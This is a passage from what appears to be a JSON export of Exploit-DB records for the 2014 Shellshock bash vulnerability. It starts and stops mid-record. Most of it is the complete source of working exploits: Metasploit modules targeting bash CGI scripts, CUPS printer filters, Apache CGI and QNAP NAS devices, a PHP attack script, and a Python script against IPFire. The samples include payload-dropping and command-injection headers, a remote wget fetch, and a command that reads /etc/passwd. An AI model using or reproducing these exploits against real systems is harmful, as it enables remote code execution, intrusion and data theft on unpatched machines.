CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-2014-7227,CVE...", "published": "2014-09-25T00:00:00", "type": "exploitdb", "title": "GNU bash Environment Variable Command Injection MSF", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-09-25T00:00:00", "id": "EDB-ID:34777", "href": "https://www.exploit-db.com/exploits/34777/", "sourceData": " require 'msf/core'\r\n\r\n class Metasploit3 < Msf::Auxiliary\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'bashedCgi',\r\n 'Description' => %q{\r\n Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. \r\n },\r\n 'Author' => \r\n [ \r\n 'Stephane Chazelas', # vuln discovery \r\n 'Shaun Colley <scolley at ioactive.com>' # metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' => [ 'CVE', '2014-6271' ],\r\n 'Targets' => \r\n [\r\n [ 'cgi', {} ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'DisableNops' => true\r\n },\r\n 'DefaultOptions' => { 'PAYLOAD' => 0 } \r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),\r\n OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])\r\n ], self.class)\r\n end\r\n\r\n def run \r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => datastore['TARGETURI'],\r\n 'agent' => \"() { :;}; \" + datastore['CMD']\r\n })\r\n\r\n if res && res.code == 200\r\n print_good(\"Command sent - 200 received\")\r\n else\r\n print_error(\"Command sent - non-200 reponse\")\r\n end\r\n end\r\n end\r\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34777/"}, {"lastseen": "2016-02-04T00:39:00", "description": "CUPS Filter Bash Environment Variable Code Injection. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-2014-7227,CVE-...", "published": "2014-10-29T00:00:00", "type": "exploitdb", "title": "CUPS Filter Bash Environment Variable Code Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-10-29T00:00:00", "id": "EDB-ID:35115", "href": "https://www.exploit-db.com/exploits/35115/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = GoodRanking\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'CUPS Filter Bash Environment Variable Code Injection',\r\n 'Description' => %q{\r\n This module exploits a post-auth code injection in specially crafted\r\n environment variables in Bash, specifically targeting CUPS filters\r\n through the PRINTER_INFO and PRINTER_LOCATION variables by default.\r\n },\r\n 'Author' => [\r\n 'Stephane Chazelas', # Vulnerability discovery\r\n 'lcamtuf', # CVE-2014-6278\r\n 'Brendan Coles <bcoles[at]gmail.com>' # msf\r\n ],\r\n 'References' => [\r\n ['CVE', '2014-6271'],\r\n ['CVE', '2014-6278'],\r\n ['EDB', '34765'],\r\n ['URL', 'https://access.redhat.com/articles/1200223'],\r\n ['URL', 'http://seclists.org/oss-sec/2014/q3/649']\r\n ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix',\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => \"\\x00\\x0A\\x0D\",\r\n 'DisableNops' => true\r\n 
},\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic bash awk ruby'\r\n },\r\n # Tested:\r\n # - CUPS version 1.4.3 on Ubuntu 10.04 (x86)\r\n # - CUPS version 1.5.3 on Debian 7 (x64)\r\n # - CUPS version 1.6.2 on Fedora 19 (x64)\r\n # - CUPS version 1.7.2 on Ubuntu 14.04 (x64)\r\n 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Sep 24 2014',\r\n 'License' => MSF_LICENSE\r\n ))\r\n register_options([\r\n Opt::RPORT(631),\r\n OptBool.new('SSL', [ true, 'Use SSL', true ]),\r\n OptString.new('USERNAME', [ true, 'CUPS username', 'root']),\r\n OptString.new('PASSWORD', [ true, 'CUPS user password', '']),\r\n OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]),\r\n OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # CVE-2014-6271\r\n #\r\n def cve_2014_6271(cmd)\r\n %{() { :;}; $(#{cmd}) & }\r\n end\r\n\r\n #\r\n # CVE-2014-6278\r\n #\r\n def cve_2014_6278(cmd)\r\n %{() { _; } >_[$($())] { echo -e \"\\r\\n$(#{cmd})\\r\\n\" ; }}\r\n end\r\n\r\n #\r\n # Check credentials\r\n #\r\n def check\r\n @cookie = rand_text_alphanumeric(16)\r\n printer_name = rand_text_alphanumeric(10 + rand(5))\r\n res = add_printer(printer_name, '')\r\n if !res\r\n vprint_error(\"#{peer} - No response from host\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.headers['Server'] =~ /CUPS\\/([\\d\\.]+)/\r\n vprint_status(\"#{peer} - Found CUPS version #{$1}\")\r\n else\r\n print_status(\"#{peer} - Target is not a CUPS web server\")\r\n return Exploit::CheckCode::Safe\r\n end\r\n if res.body =~ /Set Default Options for #{printer_name}/\r\n vprint_good(\"#{peer} - Added printer successfully\")\r\n delete_printer(printer_name)\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n vprint_error(\"#{peer} - Authentication failed\")\r\n elsif res.code == 426\r\n 
vprint_error(\"#{peer} - SSL required - set SSL true\")\r\n end\r\n Exploit::CheckCode::Detected\r\n end\r\n\r\n #\r\n # Exploit\r\n #\r\n def exploit\r\n @cookie = rand_text_alphanumeric(16)\r\n printer_name = rand_text_alphanumeric(10 + rand(5))\r\n\r\n # Select target CVE\r\n case datastore['CVE']\r\n when 'CVE-2014-6278'\r\n cmd = cve_2014_6278(payload.raw)\r\n else\r\n cmd = cve_2014_6271(payload.raw)\r\n end\r\n\r\n # Add a printer containing the payload\r\n # with a CUPS filter pointing to /bin/bash\r\n res = add_printer(printer_name, cmd)\r\n if !res\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not add printer - Connection failed.\")\r\n elsif res.body =~ /Set Default Options for #{printer_name}/\r\n print_good(\"#{peer} - Added printer successfully\")\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n fail_with(Failure::NoAccess, \"#{peer} - Could not add printer - Authentication failed.\")\r\n elsif res.code == 426\r\n fail_with(Failure::BadConfig, \"#{peer} - Could not add printer - SSL required - set SSL true.\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Could not add printer.\")\r\n end\r\n\r\n # Add a test page to the print queue.\r\n # The print job triggers execution of the bash filter\r\n # which executes the payload in the environment variables.\r\n res = print_test_page(printer_name)\r\n if !res\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not add test page to print queue - Connection failed.\")\r\n elsif res.body =~ /Test page sent; job ID is/\r\n vprint_good(\"#{peer} - Added test page to printer queue\")\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n fail_with(Failure::NoAccess, \"#{peer} - Could not add test page to print queue - Authentication failed.\")\r\n elsif res.code == 426\r\n fail_with(Failure::BadConfig, \"#{peer} - Could not add test page to print queue - SSL required - set SSL true.\")\r\n else\r\n fail_with(Failure::Unknown, \"#{peer} - Could 
not add test page to print queue.\")\r\n end\r\n\r\n # Delete the printer\r\n res = delete_printer(printer_name)\r\n if !res\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not delete printer - Connection failed.\")\r\n elsif res.body =~ /has been deleted successfully/\r\n print_status(\"#{peer} - Deleted printer '#{printer_name}' successfully\")\r\n elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true)\r\n vprint_warning(\"#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.\")\r\n elsif res.code == 426\r\n vprint_warning(\"#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.\")\r\n else\r\n vprint_warning(\"#{peer} - Could not delete printer '#{printer_name}'\")\r\n end\r\n end\r\n\r\n #\r\n # Add a printer to CUPS\r\n #\r\n def add_printer(printer_name, cmd)\r\n vprint_status(\"#{peer} - Adding new printer '#{printer_name}'\")\r\n\r\n ppd_name = \"#{rand_text_alphanumeric(10 + rand(5))}.ppd\"\r\n ppd_file = <<-EOF\r\n*PPD-Adobe: \"4.3\"\r\n*%==== General Information Keywords ========================\r\n*FormatVersion: \"4.3\"\r\n*FileVersion: \"1.00\"\r\n*LanguageVersion: English\r\n*LanguageEncoding: ISOLatin1\r\n*PCFileName: \"#{ppd_name}\"\r\n*Manufacturer: \"Brother\"\r\n*Product: \"(Brother MFC-3820CN)\"\r\n*1284DeviceID: \"MFG:Brother;MDL:MFC-3820CN\"\r\n*cupsVersion: 1.1\r\n*cupsManualCopies: False\r\n*cupsFilter: \"application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash\"\r\n*cupsModelNumber: #{rand(10) + 1}\r\n*ModelName: \"Brother MFC-3820CN\"\r\n*ShortNickName: \"Brother MFC-3820CN\"\r\n*NickName: \"Brother MFC-3820CN CUPS v1.1\"\r\n*%\r\n*%==== Basic Device Capabilities =============\r\n*LanguageLevel: \"3\"\r\n*ColorDevice: True\r\n*DefaultColorSpace: RGB\r\n*FileSystem: False\r\n*Throughput: \"12\"\r\n*LandscapeOrientation: Plus90\r\n*VariablePaperSize: False\r\n*TTRasterizer: Type42\r\n*FreeVM: \"1700000\"\r\n\r\n*DefaultOutputOrder: Reverse\r\n*%==== Media 
Selection ======================\r\n\r\n*OpenUI *PageSize/Media Size: PickOne\r\n*OrderDependency: 18 AnySetup *PageSize\r\n*DefaultPageSize: BrLetter\r\n*PageSize BrA4/A4: \"<</PageSize[595 842]/ImagingBBox null>>setpagedevice\"\r\n*PageSize BrLetter/Letter: \"<</PageSize[612 792]/ImagingBBox null>>setpagedevice\"\r\nEOF\r\n\r\n pd = Rex::MIME::Message.new\r\n pd.add_part(ppd_file, 'application/octet-stream', nil, %(form-data; name=\"PPD_FILE\"; filename=\"#{ppd_name}\"))\r\n pd.add_part(\"#{@cookie}\", nil, nil, %(form-data; name=\"org.cups.sid\"))\r\n pd.add_part(\"add-printer\", nil, nil, %(form-data; name=\"OP\"))\r\n pd.add_part(\"#{printer_name}\", nil, nil, %(form-data; name=\"PRINTER_NAME\"))\r\n pd.add_part(\"\", nil, nil, %(form-data; name=\"PRINTER_INFO\")) # injectable\r\n pd.add_part(\"#{cmd}\", nil, nil, %(form-data; name=\"PRINTER_LOCATION\")) # injectable\r\n pd.add_part(\"file:///dev/null\", nil, nil, %(form-data; name=\"DEVICE_URI\"))\r\n\r\n data = pd.to_s\r\n data.strip!\r\n\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'admin'),\r\n 'ctype' => \"multipart/form-data; boundary=#{pd.bound}\",\r\n 'data' => data,\r\n 'cookie' => \"org.cups.sid=#{@cookie};\",\r\n 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])\r\n )\r\n end\r\n\r\n #\r\n # Queue a printer test page\r\n #\r\n def print_test_page(printer_name)\r\n vprint_status(\"#{peer} - Adding test page to printer queue\")\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'printers', printer_name),\r\n 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),\r\n 'cookie' => \"org.cups.sid=#{@cookie}\",\r\n 'vars_post' => {\r\n 'org.cups.sid' => @cookie,\r\n 'OP' => 'print-test-page'\r\n }\r\n )\r\n end\r\n\r\n #\r\n # Delete a printer\r\n #\r\n def delete_printer(printer_name)\r\n vprint_status(\"#{peer} - Deleting printer '#{printer_name}'\")\r\n 
send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, 'admin'),\r\n 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),\r\n 'cookie' => \"org.cups.sid=#{@cookie}\",\r\n 'vars_post' => {\r\n 'org.cups.sid' => @cookie,\r\n 'OP' => 'delete-printer',\r\n 'printer_name' => printer_name,\r\n 'confirm' => 'Delete Printer'\r\n }\r\n )\r\n end\r\n\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35115/"}, {"lastseen": "2016-02-04T00:10:05", "description": "Bash - CGI RCE (MSF) Shellshock Exploit. CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-2014-7227,CVE-2014-7910. We...", "published": "2014-10-06T00:00:00", "type": "exploitdb", "title": "Bash - CGI RCE MSF Shellshock Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-10-06T00:00:00", "id": "EDB-ID:34895", "href": "https://www.exploit-db.com/exploits/34895/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::EXE\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Shellshock Bashed CGI RCE',\r\n 'Description' => %q{\r\n This module exploits the shellshock vulnerability in apache cgi. 
It allows you to\r\n excute any metasploit payload you want.\r\n },\r\n 'Author' =>\r\n [\r\n 'Stephane Chazelas',\t# vuln discovery\r\n 'Fady Mohamed Osman'\t# Metasploit module f.othman at zinad.net\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2014-6271' ]\r\n ],\r\n 'Payload'\t =>\r\n {\r\n 'BadChars' => \"\",\r\n },\r\n 'Platform' => 'linux',\r\n 'Arch'\t\t => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Aug 13 2014'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) ,\r\n OptString.new('FILEPATH', [true, 'The url ', '/tmp'])\r\n ], self.class)\r\n end\r\n\r\n def exploit\r\n @payload_name = \"#{rand_text_alpha(5)}\"\r\n full_path = datastore['FILEPATH'] + '/' + @payload_name\r\n payload_exe = generate_payload_exe\r\n if payload_exe.blank?\r\n fail_with(Failure::BadConfig, \"#{peer} - Failed to generate the ELF, select a native payload\")\r\n end\r\n peer = \"#{rhost}:#{rport}\"\r\n print_status(\"#{peer} - Creating payload #{full_path}\")\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => datastore['TARGETURI'],\r\n 'agent' => \"() { :;}; /bin/bash -c \\\"\" + \"printf \" + \"\\'\" + Rex::Text.hexify(payload_exe).gsub(\"\\n\",'') + \"\\'\" + \"> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\\\"\"\r\n })\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34895/"}, {"lastseen": "2016-02-04T03:40:08", "description": "QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection. 
CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,...", "published": "2015-03-26T00:00:00", "type": "exploitdb", "title": "QNAP - Web Server Remote Code Execution via Bash Environment Variable Code Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2015-03-26T00:00:00", "id": "EDB-ID:36504", "href": "https://www.exploit-db.com/exploits/36504/", "sourceData": "# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection\r\n# Date: 7 February 2015\r\n# Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]\r\n# Employer homepage: http://www.securegroup.it\r\n# Vendor homepage: http://www.qnap.com\r\n# Version: All Turbo NAS models except TS-100, TS-101, TS-200\r\n# Tested on: TS-1279U-RP\r\n# CVE : 2014-6271\r\n# Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61\r\n\r\n\r\n##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/d3vpp/metasploit-modules\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Auxiliary\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',\r\n 'Description' => %q{\r\n\t\tThis module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.\r\n\t\tAffected products:\r\n\t\tAll Turbo NAS models except TS-100, TS-101, TS-200\r\n\t\t},\r\n 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]\r\n 
'License' => MSF_LICENSE,\r\n 'References' => [\r\n\t\t\t['CVE', '2014-6271'], #aka ShellShock\r\n\t\t\t['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']\r\n\t\t],\r\n 'Platform' => ['unix']\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']),\r\n OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\tbegin\r\n \tres = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'agent' => \"() { :;}; echo; /usr/bin/id\"\r\n })\r\n\trescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE\r\n\t\tvprint_error(\"Connection failed\")\r\n\t\treturn Exploit::CheckCode::Unknown\r\n end\r\n\t\r\n if !res\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code== 302 and res.body.include? 'uid'\r\n\t return Exploit::CheckCode::Vulnerable\r\n end\r\n return Exploit::CheckCode::Safe\r\n end\r\n\t\r\n\r\n def run\r\n\r\n\tres = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'agent' => \"() { :;}; echo; #{datastore['CMD']}\"\r\n })\r\n\t\r\n\tif res.body.empty?\r\n\t\tprint_error(\"No data found.\")\r\n\telsif res.code== 302\r\n\t\tprint_status(\"#{rhost}:#{rport} - bash env variable injected\")\r\n\t\tputs \" \"\r\n\t\tprint_line(res.body)\r\n end\r\n\tend\r\n\t\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36504/"}, {"lastseen": "2016-02-03T23:53:49", "description": "Bash - Environment Variables Code Injection Exploit (ShellShock). 
CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-7169,CVE-2014-7196,CVE-20...", "published": "2014-09-25T00:00:00", "type": "exploitdb", "title": "Bash - Environment Variables Code Injection Exploit ShellShock", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-09-25T00:00:00", "id": "EDB-ID:34766", "href": "https://www.exploit-db.com/exploits/34766/", "sourceData": "<?php\r\n/*\r\nTitle: Bash Specially-crafted Environment Variables Code Injection Vulnerability\r\nCVE: 2014-6271\r\nVendor Homepage: https://www.gnu.org/software/bash/\r\nAuthor: Prakhar Prasad && Subho Halder\r\nAuthor Homepage: https://prakharprasad.com && https://appknox.com\r\nDate: September 25th 2014\r\nTested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26\r\n\t GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)\r\nUsage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd\r\n\t Eg. 
php bash.php -u http://localhost/cgi-bin/hello -c \"wget http://appknox.com -O /tmp/shit\"\r\nReference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/\r\n\r\nTest CGI Code : #!/bin/bash\r\n\t\t\t\techo \"Content-type: text/html\"\r\n\t\t\t\techo \"\"\r\n\t\t\t\techo \"Bash-is-Vulnerable\"\r\n\r\n*/\r\nerror_reporting(0);\r\nif(!defined('STDIN')) die(\"Please run it through command-line!\\n\");\r\n$x = getopt(\"u:c:\");\r\nif(!isset($x['u']) || !isset($x['c']))\r\n{\r\n\tdie(\"Usage: \".$_SERVER['PHP_SELF'].\" -u URL -c cmd\\n\");\r\n\r\n}\r\n$url = $x['u'];\r\n$cmd = $x['c'];\r\n\r\n$context = stream_context_create(\r\n\tarray(\r\n\t\t'http' => array(\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'header' => 'User-Agent: () { :;}; /bin/bash -c \"'.$cmd.'\"'\r\n\t\t)\r\n\t)\r\n);\r\n$req = file_get_contents($url, false, $context);\r\nif(!$req && strpos($http_response_header[0],\"500\") > 0 )\r\n\tdie(\"Command sent to the server!\\n\");\r\nelse if($req && !strpos($http_response_header[0],\"500\") > 0)\r\n\tdie(\"Server didn't respond as it should!\\n\");\r\nelse if(!$req && $http_response_header == NULL)\r\n\tdie(\"A connection error occurred!\\n\")\r\n?>\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34766/"}, {"lastseen": "2016-02-04T00:02:31", "description": "IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection Exploit. 
CVE-2014-3659,CVE-2014-3671,CVE-2014-6271,CVE-2014-62771,CVE-2014-71...", "published": "2014-10-01T00:00:00", "type": "exploitdb", "title": "IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3659", "CVE-2014-62771", "CVE-2014-7227", "CVE-2014-7169", "CVE-2014-6271", "CVE-2014-3671", "CVE-2014-7910", "CVE-2014-7196"], "modified": "2014-10-01T00:00:00", "id": "EDB-ID:34839", "href": "https://www.exploit-db.com/exploits/34839/", "sourceData": "#!/usr/bin/env python\r\n#\r\n# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)\r\n#\r\n# Exploit Author : Claudio Viviani\r\n#\r\n# Vendor Homepage : http://www.ipfire.org\r\n#\r\n# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso\r\n#\r\n# Date : 2014-09-29\r\n#\r\n# Fixed version: IPFire 2.15 core 83 (2014-09-28)\r\n#\r\n# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.\r\n# It can be maintained via a web interface.\r\n# The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.\r\n# IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.\r\n#\r\n# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection\r\n# (CVE-2014-6271)\r\n#\r\n# Suggestion:\r\n#\r\n# If you can't update the distro and you have installed ipfire via image files (Arm, Flash)\r\n# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)\r\n#\r\n#\r\n# http connection\r\nimport urllib2\r\n# Basic Auth management Base64\r\nimport base64\r\n# Args management\r\nimport optparse\r\n# Error management\r\nimport sys\r\n\r\nbanner = \"\"\"\r\n ___ _______ _______ __ _______ __\r\n | | _ | _ |__.----.-----. 
| _ .-----|__|\r\n |. |. 1 |. 1___| | _| -__| |. 1___| _ | |\r\n |. |. ____|. __) |__|__| |_____| |. |___|___ |__|\r\n |: |: | |: | |: 1 |_____|\r\n |::.|::.| |::.| |::.. . |\r\n `---`---' `---' `-------'\r\n _______ __ __ __ _______ __ __\r\n | _ | |--.-----| | | _ | |--.-----.----| |--.\r\n | 1___| | -__| | | 1___| | _ | __| <\r\n |____ |__|__|_____|__|__|____ |__|__|_____|____|__|__|\r\n |: 1 | |: 1 |\r\n |::.. . | |::.. . |\r\n `-------' `-------'\r\n\r\n IPFire <= 2.15 c0re 82 Authenticated\r\n Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n\r\n\r\n Written by:\r\n\r\n Claudio Viviani\r\n\r\n http://www.homelab.it\r\n\r\n info@homelab.it\r\n homelabit@protonmail.ch\r\n\r\n https://www.facebook.com/homelabit\r\n https://twitter.com/homelabit\r\n https://plus.google.com/+HomelabIt1/\r\n https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww\r\n\"\"\"\r\n\r\n# Check url\r\ndef checkurl(url):\r\n if url[:8] != \"https://\" and url[:7] != \"http://\":\r\n print('[X] You must insert http:// or https:// procotol')\r\n sys.exit(1)\r\n else:\r\n return url\r\n\r\ndef connectionScan(url,user,pwd,cmd):\r\n print '[+] Connection in progress...'\r\n try:\r\n response = urllib2.Request(url)\r\n content = urllib2.urlopen(response)\r\n print '[X] IPFire Basic Authentication not found'\r\n except urllib2.HTTPError, e:\r\n if e.code == 404:\r\n print '[X] Page not found'\r\n elif e.code == 401:\r\n try:\r\n print '[+] Authentication in progress...'\r\n base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\\n', '')\r\n headers = {'VULN' : '() { :;}; echo \"H0m3l4b1t\"; /bin/bash -c \"'+cmd+'\"' }\r\n response = urllib2.Request(url, None, headers)\r\n response.add_header(\"Authorization\", \"Basic %s\" % base64string)\r\n content = urllib2.urlopen(response).read()\r\n if \"ipfire\" in content:\r\n print '[+] Username & Password: OK'\r\n print '[+] Checking for vulnerability...'\r\n if 'H0m3l4b1t' in content:\r\n print '[!] 
Command \"'+cmd+'\": INJECTED!'\r\n else:\r\n print '[X] Not Vulnerable :('\r\n else:\r\n print '[X] No IPFire page found'\r\n except urllib2.HTTPError, e:\r\n if e.code == 401:\r\n print '[X] Wrong username or password'\r\n else:\r\n print '[X] HTTP Error: '+str(e.code)\r\n except urllib2.URLError:\r\n print '[X] Connection Error'\r\n else:\r\n print '[X] HTTP Error: '+str(e.code)\r\n except urllib2.URLError:\r\n print '[X] Connection Error'\r\n\r\ncommandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c \"touch /tmp/test.txt\"')\r\ncommandList.add_option('-t', '--target', action=\"store\",\r\n help=\"Insert TARGET URL\",\r\n )\r\ncommandList.add_option('-c', '--cmd', action=\"store\",\r\n help=\"Insert command name\",\r\n )\r\ncommandList.add_option('-u', '--user', action=\"store\",\r\n help=\"Insert username\",\r\n )\r\ncommandList.add_option('-p', '--pwd', action=\"store\",\r\n help=\"Insert password\",\r\n )\r\noptions, remainder = commandList.parse_args()\r\n\r\n# Check args\r\nif not options.target or not options.cmd or not options.user or not options.pwd:\r\n print(banner)\r\n commandList.print_help()\r\n sys.exit(1)\r\n\r\nprint(banner)\r\n\r\nurl = checkurl(options.target)\r\ncmd = options.cmd\r\nuser = options.user\r\npwd = options.pwd\r\n\r\nconnectionScan(url,user,pwd,cmd)\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34839/"}, {"lastseen": "2016-02-04T03:40:00", "description": "QNAP - Admin Shell via Bash Environment Variable Code Injection. 
